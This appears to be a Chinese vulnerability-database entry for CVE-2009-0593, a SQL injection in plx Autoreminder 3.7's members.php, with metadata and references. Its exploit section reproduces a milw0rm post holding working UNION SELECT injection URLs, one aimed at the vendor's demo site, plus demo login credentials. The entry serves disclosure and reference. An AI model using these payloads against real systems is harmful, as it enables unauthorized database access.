plxWebDev plx Autoreminder 'members.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117189 漏洞类型 SQL注入
发布时间 2009-01-04 更新时间 2009-02-17
CVE编号 CVE-2009-0593 CNNVD-ID CNNVD-200902-355
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/7663
https://cxsecurity.com/issue/WLB-2009020196
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-355
|漏洞详情
plxAutoReminder是一款自动提醒脚本工具。plxAutoReminder3.7版本的members.php中存在SQL注入漏洞。远程验证用户可以借助一个newar参数中的id参数,执行任意SQL指令。
|漏洞EXP
[~] plx Autoreminder v3.7 (id) R-Sql Ýnj
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: trt-turk@hotmail.com
[~]
[~] Date: 04.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

you must login to site

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users :)
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]
|参考资料

来源:BID
名称:33106
链接:http://www.securityfocus.com/bid/33106
来源:MILW0RM
名称:7663
链接:http://www.milw0rm.com/exploits/7663
来源:SECUNIA
名称:33283
链接:http://secunia.com/advisories/33283